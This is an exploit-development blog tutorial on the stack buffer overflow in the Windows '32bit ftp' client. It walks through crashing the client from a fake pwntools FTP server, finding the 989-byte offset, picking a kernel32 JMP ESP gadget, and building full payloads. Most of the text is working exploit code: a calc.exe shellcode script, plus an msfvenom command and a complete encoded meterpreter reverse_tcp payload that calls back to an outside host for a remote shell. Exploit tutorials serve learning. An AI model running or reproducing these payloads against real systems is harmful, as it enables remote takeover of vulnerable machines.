Windows Buffer Overflow (32bit ftp)
Today I will show how to exploit a 32-bit Windows buffer overflow in the 32bit ftp client. This is my first blog post.
What is a buffer?
Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs.
A buffer overflow occurs when a program or process attempts to write more data to a fixed-length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer. On the stack, the values that get overwritten include the function's saved return address, which is what lets an attacker redirect execution.
There are a lot of tutorials about this 32bit ftp Windows buffer overflow, but I want to use more modern tooling (pwntools) while exploiting it. Let's start.
- You can download the 32bit ftp executable here
- Any Windows version can be used as the target
- Immunity Debugger (with the mona.py plugin)
First, load 32bit ftp in Immunity Debugger:
File > Open > select the ftp executable and open it.
When run under the debugger, the client asks for an FTP server IP and port, so we need to create an FTP server and let the client connect to us. Let's create a simple FTP server using pwntools that does nothing but send the 220 greeting banner:
from pwn import *

l = listen(21)                  # fake FTP server; binding port 21 needs root
payload = b"Sent some strings"
_ = l.wait_for_connection()     # block until the client connects to us
l.sendline(b"220 " + payload)   # FTP greeting banner carrying our data

sudo python test.py
Important: every time you run a test, restart the target in the debugger by pressing Ctrl+F2 or Debug > Restart, so the client reconnects to the fresh listener.
Next, let's crash the client with a bunch of "A"s:

from pwn import *

l = listen(21)
payload = b"A" * 1000           # 1000 bytes of 0x41
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)   # oversized banner

Great! It crashes. When we look at the debugger, the stack is full of "A"s and EIP is 41414141.
EIP (and several other registers) have been overwritten with 41 (hex for "A"). This means the saved return address on the stack was overwritten by our data: we have a buffer overflow and we have proven that we control EIP. At this point we only know that the 4 bytes that land in EIP are somewhere within the 1000-byte payload; what we need to do next is find their exact offset so we can put a chosen address there.
Next step: find the offset. Instead of 1000 "A"s, send a cyclic (de Bruijn) pattern in which every 4-byte window is unique, so the value that ends up in EIP identifies one position:

from pwn import *

l = listen(21)
payload = cyclic(1000)          # unique 4-byte windows: "aaaabaaacaaad..."
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)

Read the EIP value from the debugger (786A6161) and look it up with cyclic_find(0x786A6161). Immunity shows the register as a dword, which in memory is the bytes 61 61 6A 78 ("aajx"); cyclic_find() takes care of the little-endian conversion.
Offset = 989
To execute shellcode we need somewhere reliable to jump. At the moment of the crash, ESP points into our own buffer, just past the overwritten return address. So if we overwrite EIP with the address of a JMP ESP (or CALL ESP) instruction in a loaded module, the CPU executes that instruction and lands in the data right after the return address, where we place the shellcode. When you loaded the FTP client in Immunity, you saw that kernel32.dll was also loaded, so we search it for such an instruction with mona:
!mona jmp -r esp -m kernel
You will see 3 JMP ESP addresses and 2 CALL ESP addresses; any of them works. One caveat: kernel32.dll is relocated by ASLR on each boot of a modern Windows, so an address from it only stays valid until the target reboots. That is why the calc script and the reverse-shell script below use different addresses (0x765A3132 and 0x771F3132: the same 0x3132 offset inside the module at a different base). Re-run the mona search after a reboot, or prefer a module of the application itself that mona flags as not ASLR/rebased if you need something stable. First I will pop a calculator; after that I will show how to generate a reverse shell and exploit with it.
To generate calc.exe shellcode with msfvenom:
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b "\x00"
Note: apart from the null byte that -b "\x00" already excludes, this client has no bad characters, so I will not show how to find and avoid bad characters here; I will write about that in another post.
The goal is: 989 bytes of padding + JMP ESP address + NOP sled + shellcode. In this exploit JMP ESP lands exactly on the first byte after the return address, so the NOP sled is only a small safety margin rather than a necessity.
Why does this exploit contain a NOP sled?
Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.
Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.
The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.
A 128-byte NOP sled is just a group of NOP instructions 128 bytes wide.
NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.
NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.
Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work
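The offset-finding and payload-assembly steps above, as an added worked example that is not part of the original post. It reimplements the cyclic pattern in plain Python (the FKM de Bruijn construction pwntools' cyclic() uses, alphabet a-z, 4-byte windows) so it runs without pwntools and offline, and it adds the checks a practitioner wants before sending: that the EIP slot really holds the gadget, that the shellcode sits right after the sled, and that no bad character appears after the padding. The gadget address is the one the post found in its session (it changes with ASLR); the shellcode bytes are a placeholder, not real shellcode.

```python
import struct

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(length, alphabet=ALPHABET, n=4):
    """Prefix of a de Bruijn sequence built with the FKM algorithm, the same
    construction pwntools' cyclic() uses (a-z, n=4): every 4-byte window is
    unique, so a value read out of EIP maps back to exactly one offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if len(out) >= length:            # stop early, we only need `length` bytes
            return
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out[:length]).encode()


def find_offset(eip, pattern):
    """Map the EIP value as the debugger shows it (e.g. 0x786A6161) to the
    offset of the bytes that produced it. x86 is little-endian, so the dword
    786A6161 is the bytes 61 61 6A 78 ("aajx") in memory."""
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not in pattern: the crash did not come from our data")
    return idx


def build_payload(offset, jmp_esp, shellcode, nop_len=30):
    """Layout from the post: padding | JMP ESP address | NOP sled | shellcode.
    When the overwritten return address is popped, ESP points at the NOPs,
    so JMP ESP lands on the sled and slides into the shellcode."""
    payload = b"A" * offset
    payload += struct.pack("<I", jmp_esp)   # little-endian, what p32() does
    payload += b"\x90" * nop_len
    payload += shellcode
    return payload


def find_badchars(data, badchars=b"\x00"):
    """Bytes that must not appear after the padding. The post found none
    besides NUL; for a line-based protocol like FTP, CR and LF (0x0d, 0x0a)
    are also worth adding here, since the banner travels as one line."""
    return sorted({b for b in data if b in badchars})


def check_layout(payload, offset, jmp_esp, nop_len, shellcode):
    """Pre-flight checks: gadget in the EIP slot, shellcode right after the
    sled, and no bad characters anywhere from the EIP slot onward."""
    eip_ok = payload[offset:offset + 4] == struct.pack("<I", jmp_esp)
    start = offset + 4 + nop_len
    sc_ok = payload[start:start + len(shellcode)] == shellcode
    clean = not find_badchars(payload[offset:])
    return eip_ok and sc_ok and clean


if __name__ == "__main__":
    pattern = de_bruijn(1000)                   # what the post sends as cyclic(1000)
    offset = find_offset(0x786A6161, pattern)   # EIP from the Immunity crash
    print("offset to EIP:", offset)             # 989, matching the post

    JMP_ESP = 0x765A3132        # kernel32 JMP ESP from the post's session; re-find it with mona
    SHELLCODE = b"\xcc" * 32    # placeholder (int3s), not real shellcode
    payload = build_payload(offset, JMP_ESP, SHELLCODE)
    print("layout ok:", check_layout(payload, offset, JMP_ESP, 30, SHELLCODE))
```

The FKM construction emits the Lyndon words of length dividing 4 in lexicographic order ("a", "aaab", "aaac", ...), which is why "aajx" sits at 989: 1 + 25 words of "aaa?" + 8 groups of 25 words "aab?".."aai?" = 901, then "aajx" is the 23rd word of the "aaj?" group. A payload that fails check_layout (for example a gadget whose address contains a null byte) should never be sent; choose another gadget instead.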
from pwn import *

OFFSET = 989                     # bytes before the saved return address (from cyclic_find)
JMP_ESP = 0x765A3132             # JMP ESP in kernel32.dll, found with !mona jmp -r esp -m kernel

payload = b"\x41" * OFFSET       # padding up to EIP
payload += p32(JMP_ESP)          # overwrite EIP with the gadget address (little-endian)
payload += b"\x90" * 30          # NOP sled; ESP points here after the jump
payload += (                     # calc.exe shellcode used in the post (a raw, null-free calc
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"   # payload, not the
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"   # alphanumeric msfvenom
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"   # output above; either works)
    b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)

l = listen(21)                   # fake FTP server; port 21 needs root
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)    # banner carrying padding + EIP + sled + shellcode

Okay, calc.exe pops up successfully. Now I will generate reverse-shell shellcode with msfvenom, because I want to control this machine and popping calc isn't enough for me :D...
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 --platform windows -e x86/alpha_mixed -f c -b "\x00"
Put the generated buffer into the Python script and run it:
from pwn import *

OFFSET = 989                     # same offset as before
JMP_ESP = 0x771F3132             # kernel32 JMP ESP, re-found with mona (ASLR moved the module)

payload = b"\x41" * OFFSET
payload += p32(JMP_ESP)
payload += b"\x90" * 30
payload += (                     # windows/meterpreter/reverse_tcp, x86/alpha_mixed encoded
    b"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
    b"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
    b"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
    b"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
    b"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
    b"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
    b"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
    b"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
    b"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
    b"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
    b"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
    b"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
    b"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
    b"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
    b"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
    b"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
    b"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
    b"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
    b"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
    b"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
    b"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
    b"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
    b"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
    b"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
    b"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
    b"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
    b"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
    b"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
    b"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
    b"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
    b"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
    b"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
    b"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
    b"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
    b"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
    b"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
    b"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
    b"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
    b"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
    b"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
    b"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
    b"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
    b"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
    b"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
    b"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
    b"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)

l = listen(21)
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)

Start the handler in another terminal (msfconsole with exploit/multi/handler, the same payload, LHOST and LPORT) and wait for the connection.
Let's stop here!
Exploit development is a long journey. It's endless; we just need to keep running. 😀 😀
If you face any trouble while testing, just ping me.